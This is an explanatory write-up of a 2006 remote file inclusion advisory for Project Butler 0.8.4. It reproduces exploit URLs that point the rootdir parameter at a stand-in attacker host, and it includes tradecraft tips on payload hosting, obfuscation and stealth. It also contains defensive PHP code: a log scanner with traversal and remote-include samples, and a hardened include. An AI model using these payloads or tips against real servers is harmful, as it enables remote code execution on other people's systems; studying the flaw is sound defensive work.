Project Butler 0.8.4 'rootdir' Remote File Inclusion Explained

What this paper is
This paper details a Remote File Inclusion (RFI) vulnerability found in Project Butler version 0.8.4. RFI vulnerabilities allow an attacker to trick a web application into including and executing code from a remote server. In this case, the rootdir parameter is the vector for this attack.
Simple technical breakdown
Project Butler is a web application. Like many web applications, it uses PHP. PHP has a feature that allows it to include code from other files. This is usually for organizing code, but if not handled carefully, it can be exploited.
The vulnerability lies in how Project Butler handles the rootdir parameter. This parameter is intended to specify a directory for caching or configuration files. However, the application does not validate whether the supplied rootdir is a local path or a remote URL before using it as the prefix of a file inclusion.
An attacker can provide a URL to a malicious script hosted on their own server as the rootdir value. When Project Butler tries to include a file using this rootdir, it ends up fetching and executing the attacker's script instead of a local file.
Complete code and payload walkthrough
The provided exploit paper does not contain any executable code or shellcode. It only provides example URLs demonstrating how to trigger the vulnerability. The "exploit" section lists specific PHP files within the Project Butler application that are susceptible to this RFI.
The core of the exploit is the manipulation of the rootdir parameter. Let's break down the example URLs:
http://[Target]/[Path]/classes/Cache.class.php?rootdir=http://cmd.gif?
http://[Target]/[Path]/classes/Customer.class.php?rootdir=http://cmd.gif?
... and so on for the other .php files listed in the original advisory.
Explanation of the URL structure:
- http://[Target]/[Path]/: the base URL of the vulnerable Project Butler installation. [Target] is the IP address or hostname, and [Path] is the directory where Project Butler is deployed.
- classes/Cache.class.php (and the other .php files): the specific PHP files within the Project Butler application that are vulnerable. The attacker chooses one of these files to initiate the request.
- ?rootdir=: the query string parameter that is being manipulated.
- http://cmd.gif?: the attacker-controlled remote URL. The attacker would host a malicious script (e.g., a PHP web shell) at this URL. The .gif extension is likely a deceptive choice; it does not prevent execution, because PHP's include evaluates whatever content the remote server returns, regardless of the URL's extension. The trailing ? is likely there so that anything the application appends to rootdir (for example a file name) ends up in the query string of the attacker's URL instead of changing which remote file is fetched.
Mapping list:
- rootdir parameter -> Practical purpose: this parameter is intended to point to a directory for local file operations. Exploitation purpose: it is used to inject a remote URL, causing the web server to fetch and execute code from an attacker-controlled server.
- http://cmd.gif? -> Practical purpose: this is a placeholder for an attacker's remote server and script. Exploitation purpose: this is the malicious payload that will be executed on the target server.
Unknowns:
- The exact content of the http://cmd.gif? payload is not specified in the paper. It is assumed to be a malicious script, likely a PHP web shell, designed to provide the attacker with command execution capabilities on the target server.
- The specific PHP functions within Cache.class.php, Customer.class.php, etc., that use the rootdir parameter are not detailed. However, it is highly probable they use functions like include, require, include_once, or require_once without proper sanitization of the rootdir variable.
Practical details for offensive operations teams
- Required Access Level: Typically, an attacker needs to be able to send HTTP requests to the target web application. No prior authentication or elevated privileges on the target server are usually required for this type of RFI.
- Lab Preconditions:
  - A vulnerable Project Butler 0.8.4 installation.
  - A controlled remote server (e.g., a VPS, a cloud instance) to host the malicious payload.
  - A web server configured on the remote server to serve the malicious payload.
  - The malicious payload itself (e.g., a PHP web shell).
- Tooling Assumptions:
  - A web browser or an HTTP request tool (like curl, Burp Suite, OWASP ZAP) to craft and send the exploit requests.
  - A simple web server (like Python's http.server, Nginx, Apache) on the attacker's machine to host the payload.
- Execution Pitfalls:
  - Firewall/WAF Blocking: The target server's firewall or Web Application Firewall (WAF) might block outbound connections to the attacker's server, preventing the include function from fetching the payload.
  - PHP Configuration (allow_url_include): The target server's PHP configuration might have allow_url_include set to Off, which disables the ability to include remote files. This is a critical prerequisite for the exploit to work.
  - URL Encoding/Sanitization: Some web applications might perform basic URL encoding or sanitization that could interfere with the exploit if not handled carefully.
  - Payload Extension: If the target server is configured to only execute PHP files with a .php extension, using a .gif extension for the payload might fail. The attacker might need to use a .php extension or find a way to force execution.
  - Path Traversal within RFI: While not directly shown, sometimes RFI can be combined with path traversal techniques if the rootdir is used in conjunction with other file operations.
- Tradecraft Considerations:
  - Reconnaissance: Identifying the exact version of Project Butler and its deployment path is crucial.
  - Payload Hosting: Ensure the payload server is stable and accessible from the target. Consider using a domain name that doesn't immediately raise suspicion.
  - Obfuscation: If the payload is detected, obfuscation techniques might be necessary.
  - Stealth: RFI can be noisy. The inclusion of a remote file will likely be logged on both the target and the attacker's server.
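The Stealth point above notes that the inclusion request is logged on the target. The following PHP script is an added example, not part of the original paper or of Project Butler: it scans Apache combined-format access-log lines for rootdir values that carry a URL scheme (after URL decoding, so a percent-encoded scheme is caught too) or a traversal sequence. The log lines, IP addresses, timestamps and the /butler/ deployment path are constructed sample data; only the rootdir=http://cmd.gif? value and the class file names come from the advisory.

```php
<?php
// Added example (not Project Butler code): scans Apache combined-format
// access-log lines for rootdir values that carry a URL scheme or a
// traversal sequence. The sample lines below are constructed, not real traffic.
declare(strict_types=1);

const SAMPLE_LOG = <<<'LOG'
203.0.113.7 - - [14/Aug/2006:10:01:02 +0000] "GET /butler/classes/Cache.class.php?rootdir=http://cmd.gif? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.3 - - [14/Aug/2006:10:01:05 +0000] "GET /butler/index.php?rootdir=cache HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Aug/2006:10:02:11 +0000] "GET /butler/classes/common.php?rootdir=%68%74%74%70%3A%2F%2Fcmd.gif%3F HTTP/1.1" 200 512 "-" "curl/7.15"
192.0.2.9 - - [14/Aug/2006:10:03:00 +0000] "GET /butler/classes/User.class.php?rootdir=../../../../etc/passwd%00 HTTP/1.0" 200 777 "-" "-"
192.0.2.9 - - [14/Aug/2006:10:03:30 +0000] "POST /butler/login.php HTTP/1.1" 302 0 "-" "-"
LOG;

// Pulls the fields we need out of one combined-format line; null if it
// does not parse.
function parseAccessLine(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)(?: [^"]*)?" (\d{3})/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    [, $ip, $ts, $method, $target, $status] = $m;
    // Split on the first '?' only: the query itself may contain further '?'.
    [$path, $query] = array_pad(explode('?', $target, 2), 2, '');
    parse_str($query, $params);   // one round of URL decoding happens here
    return ['ip' => $ip, 'ts' => $ts, 'method' => $method,
            'path' => $path, 'status' => (int) $status, 'params' => $params];
}

// Classifies a decoded rootdir value; null means nothing suspicious.
function classifyRootdir(string $value): ?string
{
    $v = rawurldecode($value);   // second pass catches double-encoded values
    if (preg_match('#\A\s*[a-z][a-z0-9+.-]*://#i', $v)) {
        return 'remote-include';
    }
    if (strpos($v, "\0") !== false || preg_match('#(\A|[/\\\\])\.\.([/\\\\]|\z)#', $v)) {
        return 'traversal';
    }
    return null;
}

// Returns one finding per request whose rootdir looks like an inclusion attack.
function scanLog(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $req = parseAccessLine($line);
        if ($req === null || !isset($req['params']['rootdir'])
            || !is_string($req['params']['rootdir'])) {
            continue;
        }
        $kind = classifyRootdir($req['params']['rootdir']);
        if ($kind !== null) {
            $findings[] = ['ip' => $req['ip'], 'ts' => $req['ts'], 'path' => $req['path'],
                           'kind' => $kind, 'status' => $req['status']];
        }
    }
    return $findings;
}

if (PHP_SAPI === 'cli' && realpath($argv[0]) === __FILE__) {
    // Expected on the sample: lines 1 and 3 as remote-include, line 4 as traversal.
    foreach (scanLog(SAMPLE_LOG) as $f) {
        printf("%-15s %s %-40s %s (HTTP %d)\n",
            $f['ip'], $f['ts'], $f['path'], $f['kind'], $f['status']);
    }
}
```

A remote-include finding with HTTP 200 against one of the class files named in the advisory is the strongest single signal. It tells you the request reached the application, not that the include succeeded; the corroborating evidence is an outbound HTTP connection from the web server to the host named in rootdir, which the Stealth point above says is logged on both sides.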
Where this was used and when
- Context: This vulnerability was discovered and published in 2006. Project Butler was a web-based project management application.
- Usage: Exploits of this nature were common in the mid-2000s against web applications that failed to properly validate user-supplied input for file inclusion functions. Attackers would use RFI to gain initial access, often to deface websites, steal data, or use the compromised server for further attacks.
- Approximate Years/Dates: Published August 14, 2006. Exploitation would have occurred around this time and potentially for a period afterward until the vulnerability was patched or the application was updated.
Defensive lessons for modern teams
- Input Validation is Paramount: Never trust user-supplied input, especially when it's used in file operations or system commands. Always validate and sanitize input rigorously.
- Disable allow_url_include: For security reasons, the allow_url_include directive in php.ini should almost always be set to Off in production environments. If remote file inclusion is a legitimate requirement for a specific feature, it must be implemented with extreme caution and strict controls.
- Use Whitelisting: Instead of trying to blacklist potentially malicious inputs, use whitelisting to allow only known good values. For file paths, this means explicitly defining allowed directories and filenames.
- Secure Coding Practices: Developers should be trained on secure coding practices, including the dangers of insecure file inclusion and how to prevent them.
- Regular Patching and Updates: Keep all web applications and their dependencies updated to the latest secure versions.
- Web Application Firewalls (WAFs): Deploy and properly configure WAFs to detect and block common web attack patterns, including RFI attempts.
- Least Privilege: Ensure web applications run with the minimum necessary privileges to limit the impact of a compromise.
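The Input Validation, Disable allow_url_include and Use Whitelisting lessons above, together with the probable include pattern described under Unknowns, as one added PHP example that is not Project Butler's code. The vulnerable function is a hypothetical reconstruction of the pattern the paper describes (the real source for rootdir is not on the page); ALLOWED_ROOTDIRS, resolveRootdir, remoteIncludeDisabled and the demo inputs are assumptions made for this example.

```php
<?php
// Added example (not Project Butler code). The "vulnerable" function is a
// hypothetical reconstruction of the pattern the paper describes; the real
// Project Butler source for rootdir is not reproduced on the page.
declare(strict_types=1);

// Directory names the application legitimately accepts (assumed allowlist).
const ALLOWED_ROOTDIRS = ['default', 'cache', 'config'];

// --- Vulnerable pattern (hypothetical) -------------------------------------
// rootdir is taken straight from the query string and used as an include
// prefix. Nothing distinguishes "./" from "http://host/x?" and, with
// allow_url_include=On, require() would fetch and execute the remote content.
function vulnerableIncludePath(array $get): string
{
    $rootdir = $get['rootdir'] ?? '.';
    return rtrim($rootdir, '/') . '/classes/common.php';   // what would reach require()
}

// --- Hardened version ------------------------------------------------------
function resolveRootdir(string $base, string $rootdir): string
{
    // 1. Structural check: a bare directory name only. This rejects any URL
    //    scheme, slash, traversal sequence, null byte or stream wrapper.
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $rootdir)) {
        throw new InvalidArgumentException('rootdir rejected by pattern');
    }
    // 2. Allowlist: only names the application knows about.
    if (!in_array($rootdir, ALLOWED_ROOTDIRS, true)) {
        throw new InvalidArgumentException('rootdir not in allowlist');
    }
    // 3. Defence in depth: resolve symlinks and confirm the result still
    //    lives under the application base directory.
    $realBase = realpath($base);
    $real = realpath($base . DIRECTORY_SEPARATOR . $rootdir);
    if ($realBase === false || $real === false
        || strncmp($real, $realBase . DIRECTORY_SEPARATOR, strlen($realBase) + 1) !== 0) {
        throw new InvalidArgumentException('rootdir escapes application base');
    }
    return $real;
}

// Reports whether the PHP_INI_SYSTEM directive that enables remote inclusion
// is off, as the defensive lessons recommend. It cannot be changed from script code.
function remoteIncludeDisabled(): bool
{
    return !filter_var((string) ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// Runs the same constructed inputs through both functions.
function demo(): array
{
    $base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rootdir-demo-' . getmypid();
    foreach (ALLOWED_ROOTDIRS as $d) {
        if (!is_dir("$base/$d")) {
            mkdir("$base/$d", 0700, true);
        }
    }
    $inputs = ['cache', 'http://cmd.gif?', '../../etc', "cache\0", 'plugins'];
    $out = [];
    foreach ($inputs as $in) {
        $row = ['vulnerable' => vulnerableIncludePath(['rootdir' => $in])];
        try {
            $row['hardened'] = 'accepted: ' . resolveRootdir($base, $in);
        } catch (InvalidArgumentException $e) {
            $row['hardened'] = 'rejected: ' . $e->getMessage();
        }
        $out[$in] = $row;
    }
    return $out;
}

if (PHP_SAPI === 'cli' && realpath($argv[0]) === __FILE__) {
    printf("allow_url_include off: %s\n", remoteIncludeDisabled() ? 'yes' : 'NO');
    foreach (demo() as $in => $row) {
        printf("%-20s vulnerable -> %s\n%-20s hardened   -> %s\n",
            json_encode($in), $row['vulnerable'], '', $row['hardened']);
    }
}
```

The vulnerable line shows why the advisory's trailing ? matters: for rootdir=http://cmd.gif? the composed path becomes http://cmd.gif?/classes/common.php, so the file name the application appends lands in the remote query string and the same remote file is fetched whichever class file was requested. In the hardened version the pattern check alone already rejects every hostile input; the allowlist and the realpath confinement are there so that a later change to the pattern, or a symlink inside an allowed directory, still cannot reach outside the application base.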
ASCII visual (if applicable)
This exploit is a direct request-response interaction without complex architectural components. An ASCII visual isn't strictly necessary for understanding the core mechanism, but here's a simplified representation of the flow:

+-----------------+        +-----------------------+        +-------------------+
| Attacker's      | -----> | Target Web Server     | -----> | Attacker's Remote |
| Machine         |        | (Project Butler)      |        | Server            |
| (Crafts Request)|        |                       |        | (Hosts Payload)   |
+-----------------+        +-----------------------+        +-------------------+
        |                            |                                |
        | 1. Sends HTTP GET          |                                |
        |    request with            |                                |
        |    rootdir=URL             |                                |
        |--------------------------->|                                |
        |                            | 2. Receives request for        |
        |                            |    remote file.                |
        |                            |                                |
        |                            | 3. Includes remote file        |
        |                            |    (if allow_url_include=On).  |
        |                            |                                |
        |                            | 4. Fetches and executes        |
        |                            |    payload from Attacker's     |
        |                            |    Remote Server.              |
        |                            |------------------------------->|
        |                            |<-------------------------------|
        |                            |                                |
        |                            | 5. Returns result of           |
        |                            |    executed payload.           |
        |<---------------------------|                                |
        |                            |                                |

Source references
- Paper ID: 2183
- Paper Title: ProjectButler 0.8.4 - 'rootdir' Remote File Inclusion
- Author: the master
- Published: 2006-08-14
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/2183
- Raw URL: https://www.exploit-db.com/raw/2183
Original Exploit-DB Content (Verbatim)
########################################################################
# projectbutler-0.8.4 Remote File Inclusion Vulnerability
#
# Download: http://prdownloads.sourceforge.net/projectbutler/projectbutler-0.8.4.tar.gz?download
#
# Found By: the master
#
########################################################################
# exploit:
#
# http://[Target]/[Path]/classes/Cache.class.php?rootdir=http://cmd.gif?
# http://[Target]/[Path]/classes/Customer.class.php?rootdir=http://cmd.gif?
# http://[Target]/[Path]/classes/Performance.class.php?rootdir=http://cmd.gif?
# http://[Target]/[Path]/classes/Project.class.php?rootdir=http://cmd.gif?
# http://[Target]/[Path]/classes/Representative.class.php?rootdir=http://cmd.gif?
# http://[Target]/[Path]/classes/User.class.php?rootdir=http://cmd.gif?
# http://[Target]/[Path]/classes/common.php?rootdir=http://cmd.gif?
########################################################################
# milw0rm.com [2006-08-14]